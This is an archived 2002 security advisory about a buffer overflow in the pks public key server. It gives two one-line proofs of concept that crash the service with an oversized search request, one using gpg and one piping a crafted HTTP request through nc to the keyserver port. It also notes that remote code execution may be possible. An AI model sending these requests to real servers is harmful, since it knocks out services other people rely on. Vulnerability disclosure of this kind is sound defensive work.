Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Unix :: General :: unix5378.htm

pks buffer overflow
30th May 2002 [SBWID-5378]

	pks buffer overflow


	current version


	Max [] posted following:

	A    popular    pks     public     key     server     available     from  is  vulnerable  to   buffer
	overflow attack.

	A long enough (> 256b) search request will crash the service.

	It is as simple as this:


	gpg --search-keys `perl -e \"print \'A\'x512\"`



	or, without gpg,


	echo -e \"GET /pks/lookup?op=index&search=`perl -e \"print \'A\'x512\"`\"| nc keyserver-host 11371



	Fortunately (or unfortunately) in order  to  exploit  remote  execution,
	the code should be isalnum()  string  and  should  be  able  to  survive
	tolower() conversion. But  it  is  possible  to  write,  especially  for
	systems with locales, where 0x80..0xff are printable characters.


	Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH